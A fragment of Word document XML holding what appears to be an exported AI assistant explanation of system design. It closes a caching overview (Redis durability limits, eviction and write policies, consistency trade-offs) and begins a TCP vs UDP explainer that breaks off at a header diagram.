    <w:p w14:paraId="248D0710" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>redis.decrby('user:123:balance', 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5154B12D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="391DE650" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Problem: Redis is a cache — its durability guarantees are weaker than a database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B19522B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># - Redis AOF with fsync=everysec: up to 1 second of writes can be lost on crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257223EC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># - Redis RDB: up to minutes of writes can be lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D8E895" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># - Redis Cluster failover: brief window of writes may be lost during failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F596B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Use Redis as a cache (readable from backing DB on miss) not as the primary source of truth. Financial data, inventory counts, and any data where loss is unacceptable belongs in a durable database, not a cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F64E09" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="6E82F1D2">
          <v:rect id="_x0000_i4797" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="121CAC41" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108EC30" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E59DE93" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Caching = Exploiting Locality to Bridge the Storage Hierarchy Speed Gap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCB865" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="5AFAD26E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The Fundamental Laws:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367BAB3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Temporal locality:   Recently accessed data will be accessed again soon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D723EB8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Spatial locality:   Data near recently accessed data will be accessed soon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DCDC94" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Zipf's law:        Top 1% of items = 30-50% of accesses → cache the popular, ignore the rest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06FB66" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="5CE74587" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The Storage Hierarchy (the reason caching exists):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F634534" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L1 cache (~1ns) → L2/L3 (~40ns) → DRAM (~100ns) → SSD (~100µs) → HDD (~10ms) → Network (~100ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62AAB8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Each tier: 100-1000× slower but 100-1000× larger and 10-100× cheaper per GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C0B9D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Goal: make the system behave as if all data were in the fastest tier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C967DC5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="6463D298" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Eviction Policy Selection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492FDF0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Random access patterns:           LRU (recency dominates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624CF87" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Stable popularity with recency:   W-TinyLFU (frequency + recency combined)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A6B18" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Large sequential scans present:   LRU-K or W-TinyLFU (scan resistant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B7E11" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Memory-constrained, many pages:   CLOCK (minimal overhead per entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30901FE1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Long-lived popularity differences: LFU with aging (frequency dominates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423BC14" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="09F30DBB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Write Policy Selection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6276D4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Must never lose writes:           Write-through (latency penalty accepted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875902F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Write throughput critical:        Write-back (durability window accepted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51294DDD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Writes rarely read:               Write-around (avoid cache pollution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389CFB9D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="796D9830" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Cache Consistency Toolkit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7467B0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Short TTL:          Bounded staleness, simple, always works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BACDB1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Explicit invalidation: Near-immediate consistency, requires write-path cooperation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171B16D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  CDC-based:          Catches all writes, slightly delayed, robust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B0904C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Stale-while-revalidate: Zero miss latency, bounded staleness, async refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C6417" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Content addressing: Zero staleness for immutable URLs, cache forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B88DD7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="4A262F85" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>The Multi-Layer Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F9E6EC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Browser → CDN → In-process → Redis → DB Buffer Pool → Page Cache → Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CAAE6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Each layer: smaller, faster, more expensive per byte, higher eviction rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D5181E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Hit rate compounds: 90% × 90% × 90% = 72.9% reach the third layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0AF338" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Design each layer to maximize hit rate for its tier's scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0221674A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="56844159" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Cache Stampede Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACBC768" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Mutex/coalescing:           Serializes computation, adds wait latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ADA39E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  XFetch (probabilistic):     Distributes computation over time, no wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6ABF23" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Stale-while-revalidate:     Serves stale immediately, async refresh, no wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50337A48" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Jittered TTLs:              Prevents synchronized expiry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E6EA74" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="72BD5D39" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The Critical Metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE41ED" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Hit rate:           The primary cache health metric (target &gt;90%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924026D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Miss penalty:       Latency cost of each miss (motivates tiering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257E0DEE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Eviction rate:      High rate = undersized cache (motivates capacity increase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE92060" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Backend load:       Ultimate measure of cache value (requests deflected from DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8BF690" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="5D7EDD89" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The Fundamental Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6705A7D6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Consistency   ↔  Performance (shorter TTL = more consistent, more origin load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F049921" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Memory        ↔  Hit rate (more memory = higher hit rate, higher cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E735F67" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Complexity    ↔  Efficiency (write-back is complex but far more write-efficient)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FD925" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Freshness     ↔  Availability (stale-if-error = stale but available vs fresh but unavailable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA3B67" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Granularity   ↔  Invalidation difficulty (fine-grained cache = precise invalidation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0225CBE4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>caching is not an optimization applied after a system is built — it is a fundamental architectural constraint that shapes system design from the beginning.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> Every data access pattern, every API design, every consistency </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>requirement, and every cost projection depends on cache behavior. A system designed assuming caches will work perfectly (100% hit rate) is categorically different from one designed assuming caches will fail (0% hit rate) — the truth is somewhere between, and the system must gracefully handle both extremes. The most important caching decisions are not which library to use or what eviction policy to configure — they are </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>what to cache, at what granularity, with what consistency guarantee, and what the system does when the cache is cold, wrong, or unavailable.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> These decisions determine whether the cache makes the system faster and cheaper, or introduces subtle correctness bugs that surface only under specific access patterns at 3am during a traffic spike. Caching done right is invisible — users experience fast, consistent behavior. Caching done wrong is the source of the most mysterious production bugs in distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8365F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D3150F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copilot said: # TCP vs UDP in System Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DBD20A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP vs UDP in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A15B18F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What TCP and UDP Fundamentally Are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D499251" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP (Transmission Control Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> is a connection-oriented, reliable, ordered, byte-stream transport protocol. It guarantees that every byte sent arrives at the destination, in order, without corruption, exactly once — or the sender is notified of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7EFF52" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP (User Datagram Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> is a connectionless, unreliable, unordered, message-oriented transport protocol. It sends datagrams (discrete packets) with no guarantee of delivery, ordering, or duplicate prevention. It adds almost nothing over raw IP — just source/destination ports and a checksum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0515DB16" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental design philosophy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32829CDB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1364"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> "The network is unreliable. The transport layer will FIX this — providing a reliable pipe between applications, no matter what the network does."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C84A6F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1364"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> "The network is unreliable. The APPLICATION will decide what (if anything) to do about it — the transport layer just delivers packets as-is."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC6C1A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The key insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> TCP and UDP are not "good vs. bad." They represent different tradeoffs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582BEAE0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE6D84" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCP: Correctness over speed. "Every byte matters. I'll wait to ensure delivery."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C2823" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>UDP: Speed over correctness. "Freshness matters more than completeness. Don't slow me down."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C8F9F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="794DC449">
          <v:rect id="_x0000_i5013" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E967D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Protocol Headers — What Each Carries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBFF714" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 TCP Header (20–60 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7276808C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472E633C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> 0                   1                   2                   3</w:t>
      </w:r>
    </w:p>
